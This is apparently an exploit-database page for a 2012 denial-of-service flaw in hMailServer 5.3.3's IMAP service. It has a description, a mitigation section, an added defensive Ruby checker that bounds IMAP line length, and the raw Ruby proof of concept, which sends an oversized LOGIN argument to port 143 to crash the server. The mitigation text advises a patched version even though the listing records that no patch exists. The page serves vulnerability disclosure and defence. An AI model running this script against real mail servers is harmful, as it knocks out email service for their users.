vendor: hMailServer
by: Unknown
N/A
CVSS
MEDIUM
Remote Crash
CWE
Product Name: hMailServer
Affected Version From: hMailServer 5.3.3
Affected Version To: hMailServer 5.3.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2, Windows Server 2003 R2 SP2, Windows Server 2008 R2 SP1
2012

hMailServer 5.3.3 IMAP Remote Crash PoC

This exploit is a proof-of-concept for a remote crash vulnerability in hMailServer 5.3.3. By sending a specially crafted packet to the IMAP service, an attacker can cause the service to become inaccessible. This vulnerability has been tested on hMailServer 5.3.3 with default settings and has been found to reliably crash the IMAP service on Windows XP SP2 and Windows Server 2003 R2 SP2. It can also cause all services (SMTP, IMAP, and POP) to become inaccessible on Windows Server 2008 R2 SP1, although this is less reliable. To perform additional fuzzing, it is recommended to disable the 'Auto-ban' feature in the hMailServer Admin console.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of hMailServer. It is also recommended to disable the 'Auto-ban' feature in the hMailServer Admin console.
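Since the listing records no available patch, one compensating control is to bound IMAP command-line length in front of the server. The following is an added example, not part of the original advisory or of hMailServer: a bounded line checker that an inspection point or proxy could apply to client-to-server IMAP bytes. The class name, the 8192-byte limit and the sample traffic are assumptions, and IMAP literal syntax ({n}) is not handled.

```ruby
# Added example, not from the original page. MAX_LINE is an assumed policy value.
MAX_LINE = 8192

# Incremental checker for the client-to-server bytes of one IMAP connection.
# It keeps only a 64-byte prefix of each line, so memory stays bounded.
class ImapLineGuard
  attr_reader :alerts

  def initialize(max_line = MAX_LINE)
    @max = max_line
    @alerts = []
    start_line
  end

  # Feed one received chunk; returns :reject if a line in it is over the limit.
  def feed(chunk)
    verdict = :ok
    chunk.b.each_line("\n") do |piece|
      @head << piece[0, 64 - @head.bytesize] if @head.bytesize < 64
      @len += piece.bytesize
      if @len > @max
        verdict = :reject
        unless @flagged
          @flagged = true
          cmd = (@head.split(" ", 3)[1] || "?").upcase
          @alerts << { command: cmd, bytes_seen: @len }
        end
      end
      start_line if piece.end_with?("\n")
    end
    verdict
  end

  private

  def start_line
    @head = String.new   # binary buffer: tag and command name only
    @len = 0
    @flagged = false
  end
end

# Constructed sample: a normal login, then a line with the PoC's shape,
# split into 1460-byte chunks to mimic TCP segmentation.
def demo
  stream = "a1 LOGIN alice secret\r\n" \
           "a LOGIN #{'A' * 32765} AAAAAAAA\r\na LOGOUT\r\n"
  guard = ImapLineGuard.new
  verdicts = stream.scan(/.{1,1460}/m).map { |c| guard.feed(c) }
  { first_reject: verdicts.index(:reject), alerts: guard.alerts }
end
```

The checker returns :reject as soon as a line crosses the limit, before the terminating CRLF arrives, so a proxy can drop the connection without forwarding the oversized LOGIN argument.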

Exploit-DB raw data:

# Exploit Title: hMailServer 5.3.3 IMAP Remote Crash PoC
# Date: 10/27/2012
# Vendor Homepage: http://hmailserver.com
# Software Link: http://www.hmailserver.com/index.php?page=background_download_file&downloadid=207
# Version: hMailServer 5.3.3 - Build 1879
# Tested on:
#	- hMailServer 5.3.3 with default settings
#	- Reliable corruption makes IMAP service inaccessible on WIN XP SP2 and WIN 2K3R2 SP2
#	- Unreliable corruption makes all services (SMTP, IMAP, and POP) inaccessible on WIN 2K8R2 SP1
#
# Note: Disable "Auto-ban" in the hMailServer Admin console if performing additional fuzzing.

#!/usr/bin/ruby

require 'socket'

s = TCPSocket.open(ARGV[0], 143)

cmd = "a LOGIN "
address = "A" * 32765
password = " AAAAAAAA\r\n"
logout = "a LOGOUT\r\n"

pkt = cmd
pkt << address
pkt << password
pkt << logout

s.write(pkt)

while resp = s.gets
	p resp
end

s.close